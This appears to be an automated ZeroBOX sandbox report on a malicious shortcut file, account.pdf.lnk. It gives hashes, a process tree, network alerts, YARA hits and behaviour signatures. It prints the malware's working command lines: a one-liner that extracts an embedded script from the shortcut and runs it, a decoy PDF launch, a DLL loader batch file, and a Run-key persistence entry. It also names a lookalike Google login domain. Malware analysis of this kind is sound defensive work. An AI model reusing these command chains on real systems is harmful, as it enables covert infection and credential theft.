Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 8, 2023, 2:35 p.m.	Sept. 8, 2023, 2:37 p.m.

Size	265.3KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Nov 20 18:24:06 2010, mtime=Sat Nov 20 18:24:06 2010, atime=Sat Nov 20 18:24:06 2010, length=302592, window=hidenormalshowminimized
MD5	`996580c90c5efe2a727d22a77b7e69eb`
SHA256	`7c87451261dfce64fda987eb395694b5330fd958466c46c931440cd9dc227505`
CRC32	`3923B25C`
ssdeep	`6144:8t4XBZPUnEDOTLAfO/2XXnJZyRYMIgHyWzfYxg:8t4XoOOTuO/2nn6TSkQxg`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format hide_executable_file - Hide executable file Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "dwgenGeAk" C:\Users\test22\AppData\Local\Temp\account.pdf.lnk
2564
- cmd.exe "C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls
  2676
  - cmd.exe C:\Windows\system32\cmd.exe /c dir /S/b *.lnk C:\Users\test22\AppData\Local\Temp\*.lnk
    2768
  - findstr.exe findstr /b "var onm=" "C:\Users\test22\AppData\Local\Temp\account.pdf.lnk"
    2824
  - cscript.exe cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9
    2868
    - cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\test22\AppData\Local\Temp\account.pdf
      2968
      - chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "C:\Users\test22\AppData\Local\Temp\account.pdf"
        1152
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef445f1e8,0x7fef445f1f8,0x7fef445f208
        2108
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=940 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
        2188
    - cmd.exe "C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y
      3016
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat
      2480
      - cmd.exe cmd /c start rundll32.exe MSADOCG.DLL,DllUnregisterServer
        2548
    - cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js
      2808

Name	Response	Post-Analysis Lookup
login.drive-google-com.tk	A 103.108.67.191	103.108.67.191

IP Address	Status	Action
103.108.67.191	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2012811	ET DNS Query to a .tk domain - Likely Hostile	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (39 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0
IsDebuggerPresent Sept. 8, 2023, 2:35 p.m.			0	0

Command line console output was observed (21 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: 271702 GTR 93393 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: findstr console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: /b "var onm=" "C:\Users\test22\AppData\Local\Temp\account.pdf.lnk" console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\~254134656.js console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: cscript console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\~254134656.js 9 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: cls console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: Microsoft (R) Windows Script Host 버전 5.8 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: cd console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: cmd console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: /c start rundll32.exe MSADOCG.DLL,DllUnregisterServer console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 8, 2023, 2:35 p.m.	buffer: exit console_handle: 0x00000007	1	1

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 8, 2023, 2:35 p.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 8, 2023, 2:35 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 189327968 registers.r15: 189328408 registers.rcx: 1548 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 116654896 registers.rsp: 189327128 registers.r11: 189331664 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1732 registers.r12: 34584880 registers.rbp: 189327280 registers.rdi: 34321152 registers.rax: 4861440 registers.r13: 189327840	1	0	0

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 8, 2023, 2:35 p.m.	process_identifier: 2868 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x732f2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 8, 2023, 2:35 p.m.	process_identifier: 1152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 8, 2023, 2:35 p.m.	process_identifier: 2108 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 8, 2023, 2:35 p.m.	process_identifier: 2188 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 1152 crashed
__exception__ Sept. 8, 2023, 2:35 p.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 189327968 registers.r15: 189328408 registers.rcx: 1548 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 116654896 registers.rsp: 189327128 registers.r11: 189331664 registers.r8: 1994752396 registers.r9: 0 registers.rdx: 1732 registers.r12: 34584880 registers.rbp: 189327280 registers.rdi: 34321152 registers.rax: 4861440 registers.r13: 189327840	1	0	0

Steals private information from local Internet browsers (50 out of 55 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Application Cache\Index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Top Sites
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Preferences
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Policy\User Policy
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\89764e1f-463b-4e96-846c-9ed5d71183c2.dmp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Application Cache\Cache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Managed Mode Settings
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\verified_contents.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\README
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History-wal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\1152-1694151328140625.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\verified_contents.json
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\History
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Visited Links
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\File System\primary.origin
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\AnyIpMalware.store
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-64FAD828-480.pma

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\account.pdf

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\ctfmon.bat
file	C:\Users\test22\AppData\Local\Temp\MSADOCG.DLL

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\*.lnk
file	C:\Users\test22\AppData\Local\Temp\account.pdf.lnk

Creates a suspicious process (6 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /S/b .lnk C:\Users\test22\AppData\Local\Temp\.lnk
cmdline	"C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat
cmdline	"C:\Windows\System32\cmd.exe" /c start C:\Users\test22\AppData\Local\Temp\account.pdf
cmdline	"C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y
cmdline	"C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b .lnk C:\Users\test22\AppData\Local\Temp\.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls
cmdline	"C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\MSADOCG.DLL

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Sept. 8, 2023, 2:35 p.m.	show_type: 0 filepath_r: cmd parameters: /c start C:\Users\test22\AppData\Local\Temp\account.pdf filepath: cmd	1	1
ShellExecuteExW Sept. 8, 2023, 2:35 p.m.	show_type: 0 filepath_r: cmd parameters: /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y filepath: cmd	1	1
ShellExecuteExW Sept. 8, 2023, 2:35 p.m.	show_type: 0 filepath_r: cmd parameters: /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat filepath: cmd	1	1
ShellExecuteExW Sept. 8, 2023, 2:35 p.m.	show_type: 0 filepath_r: cmd parameters: /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js filepath: cmd	1	1

Potentially malicious URLs were found in the process memory dump (50 out of 690 events)

url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	http://dts.search-results.com/sr?lng=
url	http://creativecommons.org/ns
url	https://qc.search.yahoo.com/search?ei=
url	http://crbug.com/122474.
url	https://search.yahoo.com/search?ei=
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	https://ct.googleapis.com/aviator/
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://drive-daily-5.corp.google.com/
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	https://www.najdi.si/search.jsp?q=
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://search.goo.ne.jp/sgt.jsp?MT=
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://developer.chrome.com/apps/declare_permissions.html
url	https://ct.googleapis.com/rocketeer/
url	https://se.search.yahoo.com/search?ei=
url	https://developers.google.com/web/fundamentals/accessibility/accessible-styles
url	https://mammoth.ct.comodo.com/
url	http://hladaj.atlas.sk/fulltext/?phrase=
url	http://buscador.softonic.com/?q=
url	https://hk.search.yahoo.com/sugg/chrome?output=fxjson
url	https://ph.search.yahoo.com/sugg/chrome?output=fxjson
url	https://ro.search.yahoo.com/favicon.ico
url	https://kvasir.no/grafikk/favicon.ico
url	https://codereview.chromium.org/25305002).
url	https://ve.search.yahoo.com/sugg/chrome?output=fxjson
url	http://search.conduit.com/Results.aspx?q=
url	https://ct.googleapis.com/logs/argon2018/
url	https://developers.google.com/web/tools/lighthouse/
url	https://support.google.com/chrome/answer/185277
url	https://nz.search.yahoo.com/sugg/chrome?output=fxjson
url	https://github.com/bgrins/spectrum
url	http://crbug.com/642141
url	http://code.google.com/p/chromium/issues/entry
url	https://www.google.com/favicon.ico
url	https://suggest.yandex.kz/suggest-ff.cgi?part=
url	https://www.yandex.kz/chrome/newtab
url	http://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager07.htmlhttp://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager02.htmlhttp://www.macromedia.com/support/documentation/kr/flashplayer/help/settings_manager06.htmlhttps://support.google.com/chrome/answer/118142065782681https://support.google.com/chrome/?p=settings_clear_browsing_datahttps://history.google.com/history/?utm_source=chrome_cbdhttps://myactivity.google.com/myactivity/?utm_source=chrome_nhttps://myactivity.google.com/myactivity/?utm_source=chrome_hChrome
url	http://dev.w3.org/csswg/css3-transitions/

Yara rule detected in process memory (50 out of 1534 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	browser info stealer	rule	infoStealer_browser_Zero
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader
description	Create a windows service	rule	Create_Service

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Sept. 8, 2023, 2:36 p.m.	status_code: 0xc0000005 process_identifier: 1152 process_handle: 0x0000000000000094		0	0
NtTerminateProcess Sept. 8, 2023, 2:36 p.m.	status_code: 0xc0000005 process_identifier: 1152 process_handle: 0x0000000000000094	1	0	0

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	C:\Windows\system32\cmd.exe /c dir /S/b .lnk C:\Users\test22\AppData\Local\Temp\.lnk
cmdline	cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js
cmdline	"C:\Windows\System32\cmd.exe" /c DIR 007629965203812111640254143179\01524813550762405048 & for /f "delims=" %a in ('dir /S/b .lnk C:\Users\test22\AppData\Local\Temp\.lnk') do (if %~za gtr 93393 (findstr /b "var onm=" "%a" > C:\Users\test22\AppData\Local\Temp\~254134656.js & cscript C:\Users\test22\AppData\Local\Temp\~254134656.js 9&exit))&cls
cmdline	"C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CTFM0N.EXE

reg_value

cmd /c start C:\Users\test22\AppData\Local\Temp\ctfmon.bat

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\account.pdf

A command shell or script process was created by an unexpected parent process (4 events)

parent_process	cscript.exe	martian_process	cmd /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y
parent_process	cscript.exe	martian_process	cmd /c start C:\Users\test22\AppData\Local\Temp\account.pdf
parent_process	cscript.exe	martian_process	cmd /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat
parent_process	cscript.exe	martian_process	cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js

One or more non-whitelisted processes were created (11 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef445f1e8,0x7fef445f1f8,0x7fef445f208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1252,1068463943848656389,9381778915884664680,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=815552CDE72A5D7590704E1C828ACECF --mojo-platform-channel-handle=1268 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=940 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	cscript.exe	martian_process	cmd /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y
parent_process	cscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js
parent_process	cscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat
parent_process	cscript.exe	martian_process	cmd /c start C:\Users\test22\AppData\Local\Temp\account.pdf
parent_process	cscript.exe	martian_process	cmd /c C:\Users\test22\AppData\Local\Temp\ctfmon.bat
parent_process	cscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c start C:\Users\test22\AppData\Local\Temp\account.pdf
parent_process	cscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c copy C:\Windows\SysWow64\rundll32.exe C:\Users\test22\AppData\Local\Temp\rundll32.exe /y
parent_process	cscript.exe	martian_process	cmd /c del /q C:\Users\test22\AppData\Local\Temp\~254134656.js

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Resumed a suspended thread in a remote process potentially indicative of process injection (49 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2564 resumed a thread in remote process 2676
Process injection	Process 2968 resumed a thread in remote process 1152
Process injection	Process 2108 resumed a thread in remote process 1152
Process injection	Process 2548 resumed a thread in remote process 2708
NtResumeThread Sept. 8, 2023, 2:35 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2676	1	0	0
NtResumeThread Sept. 8, 2023, 2:35 p.m.	thread_handle: 0x00000218 suspend_count: 1 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
NtResumeThread Sept. 8, 2023, 2:36 p.m.	thread_handle: 0x0000000000000158 suspend_count: 2 process_identifier: 1152	1	0	0
